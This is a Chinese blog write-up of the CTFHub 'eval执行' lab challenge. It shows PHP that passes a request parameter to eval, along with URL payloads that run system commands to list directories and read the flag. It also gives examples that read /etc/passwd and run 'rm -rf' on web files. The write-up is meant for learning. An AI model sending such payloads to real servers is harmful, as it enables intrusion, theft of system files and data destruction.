CTFHub | eval执行

秒速五厘米 2024-03-23 12:16 68阅读 0赞

#### 0x00 前言 ####

CTFHub 专注网络安全、[信息安全][Link 1]、白帽子技术的在线学习，实训平台。提供优质的赛事及学习服务，拥有完善的题目环境及配套 writeup ，降低 CTF 学习入门门槛，快速帮助选手成长，跟随主流比赛潮流。

#### 0x01 题目描述 ####

> **eval执行：**
> 
> （无）

![ecd221e6f24245db887fb6668e825242.png][] 网页显示内容

#### 0x02 解题过程 ####

**0x1 方法一： 使用蚁剑连接**

**Ⅰ**检查网页显示内容可以发现题目中直接给出了一段源代码，代码的大致意思是判断用户是否传了一个 cmd 参数，否则执行 else 。

![972ab0c4921c47e7a37c03ed37f53ee5.png][]

<?php
    if (isset($_REQUEST['cmd'])) {
        eval($_REQUEST["cmd"]);
    } else {
        highlight_file(__FILE__);
    }
    ?>

**Ⅱ**使用蚁剑连接 cmd 参数试试，测试连接发现可以成功连接，说明此题存在 eval 执行

![57c393da9f3343639f0283c934bc711e.png][]

**Ⅲ**检查目录列表发现关于 flag 的文件

![417249d9ce3d43c1bb31dfd14bbc27cf.png][]

**Ⅳ**检查文件内容发现此题 flag

![a5180fd3f6704b3282402e9c41646713.png][]

**0x2 方法二： 网页检查文件**

**Ⅰ**根据网页代码的提示，可以先把查看网页根目录文件的命令赋值给 cmd 然后执行

![a15fd6a641964e48ae178406914ccc02.png][]

http://challenge-b7776ccd779fe163.sandbox.ctfhub.com:10800/?cmd=system("ls");

**Ⅱ**继续检查上一级文件夹，这里发现一个flag\_9195的文件

![950f3439f8e84967960e9fdb3faa2cc9.png][]

http://challenge-b7776ccd779fe163.sandbox.ctfhub.com:10800/?cmd=system("ls /");

**Ⅲ**继续传参给cmd命令检查flag\_9195的文件，发现此题flag

![cf48ff78889a47cba3f977f53e3d3574.png][]

http://challenge-b7776ccd779fe163.sandbox.ctfhub.com:10800/?cmd=system("cat /flag_9195");

#### 0x03 **eval执行** ####

eval 函数可以将字符串作为代码执行，那么在使用 eval 函数作为获取用户输入的时候应该避免使用这类函数。如果用户输入的是一段恶意代码，就会导致严重的安全问题。

**例如：**

**1.**访问服务器敏感信息

?cmd=system('cat /etc/passwd')

**2.**删除网页文件

?cmd=system("rm -rf /xx/xx");

#### **0x04 参考文献** ####

> \[1\].Ho1aAs. CTFHub\_技能树\_Web之RCE——“eval执行”、“命令注入”\[EB/OL\]. \[2023-04-19\]. https://blog.csdn.net/Xxy605/article/details/107548841.

#### **0x05 总结** ####

文章内容为学习记录的笔记，由于作者水平有限，文中若有错误与不足欢迎留言，便于及时更正。

[Link 1]: https://so.csdn.net/so/search?q=%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8&spm=1001.2101.3001.7020
[ecd221e6f24245db887fb6668e825242.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/23/a6cc795ae9f6491a8d38be2763aa8d51.png
[972ab0c4921c47e7a37c03ed37f53ee5.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/23/10f1365627db44138adf615ef02aa05e.png
[57c393da9f3343639f0283c934bc711e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/23/ae7b548f44c543078fc25e85eced45a4.png
[417249d9ce3d43c1bb31dfd14bbc27cf.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/23/c941db0532194847948f31fe45694f07.png
[a5180fd3f6704b3282402e9c41646713.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/23/9153da334e7a42389a5b794e63ce4e34.png
[a15fd6a641964e48ae178406914ccc02.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/23/60ec1f7ba4784461b5c479f3987d74b5.png
[950f3439f8e84967960e9fdb3faa2cc9.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/23/ff5846e9ce7d40debdec83e5084738f1.png
[cf48ff78889a47cba3f977f53e3d3574.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/23/8ccdf9c67ad7417484b0ea576aac113d.png